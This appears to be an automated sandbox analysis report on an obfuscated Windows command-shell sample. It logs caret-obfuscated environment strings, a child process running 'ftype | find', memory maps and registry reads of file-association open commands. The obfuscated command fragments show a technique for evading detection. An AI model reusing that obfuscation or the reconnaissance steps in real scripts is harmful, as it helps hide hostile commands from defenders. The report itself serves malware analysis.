Get Environment String name = R^en6w^L^P^j^y^{^7^y^jU^6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^ False 1
Fn
Get Environment String name = ^R^en^6^w^L^P^j^y^{^7^y^j^U6^ False 1
Fn
Get Environment String name = ^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^ False 1
Fn
Get Environment String name = .^Y^.^Y^6^j^U^e/`^6^K^w^L^,^ False 1
Fn
Get Environment String name = ^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^ False 1
Fn
Get Environment String name = ^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^ False 1
Fn
Get Environment String name = ^w^L^]^6^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^ False 1
Fn
Get Environment String name = ^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^ False 1
Fn
Get Environment String name = e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^ False 1
Fn
Get Environment String name = ^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^ False 1
Fn
Get Environment String name = ^=^T!)&& (, ; , ;, ( , ; , (^S^e^T ^ ^ ^ ^}^\=^!^[^$^#^?^ False 1
Fn
Get Environment String name = ^!) , )&& ( , (^S^e^t ^ ^ ^*^}=^!^*^.^@^ False 1
Fn
Get Environment String name = ^g; ; , ^iN , ( ,'; ; ^^ft^^Y^^p^^e ;; , ^|, , ^^f^^iN^^d^^S^^t^^r ;^^c^^m '; ,) , ; ^d^o, , ;; ; (^e^c^h^O , False 1
Fn
Get Environment String name = ^*^[^-^, False 1
Fn
Get Environment String name = | False 1
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #4: cmd.exe
60 0
»
Information Value
ID #4
File Name c:\windows\system32\cmd.exe
Command Line C:\Windows\system32\cmd.exe /c ^f^t^Yp^e | ^f^IN^d "SHCm"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:39, Reason: Child Process
Unmonitor End Time: 00:01:42, Reason: Self Terminated
Monitor Duration 00:00:03
OS Process Information
»
Information Value
PID 0xae0
Parent PID 0xac0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x AE4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory r True False False -
private_0x00000000000d0000 0x000d0000 0x001cffff Private Memory rw True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory rw True False False -
private_0x00000000001e0000 0x001e0000 0x001e0fff Private Memory rw True False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory rw True False False -
private_0x00000000002b0000 0x002b0000 0x002bffff Private Memory rw True False False -
private_0x0000000000370000 0x00370000 0x0046ffff Private Memory rw True False False -
private_0x0000000000470000 0x00470000 0x0056ffff Private Memory rw True False False -
pagefile_0x0000000000570000 0x00570000 0x006f7fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000700000 0x00700000 0x00880fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000890000 0x00890000 0x01c8ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001c90000 0x01c90000 0x01fd2fff Pagefile Backed Memory r True False False -
sortdefault.nls 0x01fe0000 0x022aefff Memory Mapped File r False False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (9)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 4
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (2)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\cmd.exe os_pid = 0xae8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Windows\system32\find.exe os_pid = 0xaf0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:12 (UTC) True 1
Fn
Get Time type = Ticks, time = 137296 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 4
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Set Environment String name = COPYCMD True 2
Fn
Process #5: cmd.exe
5828 0
»
Information Value
ID #5
File Name c:\windows\system32\cmd.exe
Command Line C:\Windows\system32\cmd.exe /S /D /c" ftYpe "
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:39, Reason: Child Process
Unmonitor End Time: 00:01:43, Reason: Self Terminated
Monitor Duration 00:00:04
OS Process Information
»
Information Value
PID 0xae8
Parent PID 0xae0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x AEC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
private_0x00000000000c0000 0x000c0000 0x001bffff Private Memory rw True False False -
pagefile_0x00000000001c0000 0x001c0000 0x001c6fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory rw True False False -
private_0x00000000001e0000 0x001e0000 0x001e0fff Private Memory rw True False False -
private_0x00000000001f0000 0x001f0000 0x002effff Private Memory rw True False False -
private_0x00000000002f0000 0x002f0000 0x002f0fff Private Memory rw True False False -
private_0x00000000003b0000 0x003b0000 0x004affff Private Memory rw True False False -
private_0x0000000000600000 0x00600000 0x0060ffff Private Memory rw True False False -
pagefile_0x0000000000610000 0x00610000 0x00797fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007a0000 0x007a0000 0x00920fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000930000 0x00930000 0x01d2ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001d30000 0x01d30000 0x02072fff Pagefile Backed Memory r True False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
advapi32.dll 0x7feff0e0000 0x7feff1bafff Memory Mapped File rwx False False False -
sechost.dll 0x7feff1c0000 0x7feff1defff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7feffc50000 0x7feffd7cfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (1384)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 344
Fn
Open STD_OUTPUT_HANDLE - True 692
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Write STD_OUTPUT_HANDLE size = 103 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 100 True 15
Fn
Data
Write STD_OUTPUT_HANDLE size = 124 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 122 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 126 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 119 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 118 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 98 True 9
Fn
Data
Write STD_OUTPUT_HANDLE size = 147 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 133 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 127 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 134 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 131 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 149 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 92 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 138 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 105 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 109 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 79 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 83 True 12
Fn
Data
Write STD_OUTPUT_HANDLE size = 80 True 6
Fn
Data
Write STD_OUTPUT_HANDLE size = 104 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 87 True 10
Fn
Data
Write STD_OUTPUT_HANDLE size = 89 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 85 True 6
Fn
Data
Write STD_OUTPUT_HANDLE size = 86 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 71 True 6
Fn
Data
Write STD_OUTPUT_HANDLE size = 72 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 17 True 6
Fn
Data
Write STD_OUTPUT_HANDLE size = 125 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 45 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 51 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 70 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 76 True 11
Fn
Data
Write STD_OUTPUT_HANDLE size = 35 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 82 True 10
Fn
Data
Write STD_OUTPUT_HANDLE size = 58 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 68 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 75 True 6
Fn
Data
Write STD_OUTPUT_HANDLE size = 61 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 63 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 73 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 67 True 7
Fn
Data
Write STD_OUTPUT_HANDLE size = 50 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 52 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 53 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 78 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 90 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 99 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 81 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 93 True 8
Fn
Data
Write STD_OUTPUT_HANDLE size = 91 True 9
Fn
Data
Write STD_OUTPUT_HANDLE size = 84 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 59 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 34 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 64 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 38 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 47 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 74 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 123 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 66 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 46 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 65 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 49 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 48 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 55 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 77 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 113 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 95 True 8
Fn
Data
Write STD_OUTPUT_HANDLE size = 129 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 94 True 6
Fn
Data
Write STD_OUTPUT_HANDLE size = 69 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 136 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 88 True 8
Fn
Data
Write STD_OUTPUT_HANDLE size = 60 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 97 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 96 True 8
Fn
Data
Write STD_OUTPUT_HANDLE size = 57 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 177 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 160 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 102 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 101 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 110 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 144 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 142 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 141 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 117 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 108 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 26 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 54 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 37 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 168 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 172 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 56 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 111 True 1
Fn
Data
Registry (2196)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\*\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSProject.Workspace\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSProject.XLS5\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSProject.XLS8\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSProject.XLTemplate\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSProject.XML\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.RdcLibrary\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.RdcLibrary.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.Similarity\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.Similarity.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.SimilarityFileIdTable\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.SimilarityFileIdTable.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.SimilarityTraitsTable\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.SimilarityTraitsTable.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.2.a\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.3\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.3.a\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.4\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.4.a\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.5\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.6\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.7\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRdpWebAccess.MsRdpClientShell\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRdpWebAccess.MsRdpClientShell.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msrtedit.AAMSREdit\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsScp.MSSCP\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsScp.MSSCP.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsScp.SCPTRANS\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsScp.SCPTRANS.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSScriptControl.ScriptControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSScriptControl.ScriptControl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSSearch.IpsPi\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSSearch.IpsPi.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msshed.ShedDSO\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSSppLicenseFile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSSppPackageFile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\msstylesfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTIME.TIMEFactory\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTIME.TIMEFactory.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.3\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.4\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.5\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.6\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.7\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsTscAx.MsTscAx.8\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTSWebProxy.MSTSWebProxy\Shell\Open\Command - False 1
Fn
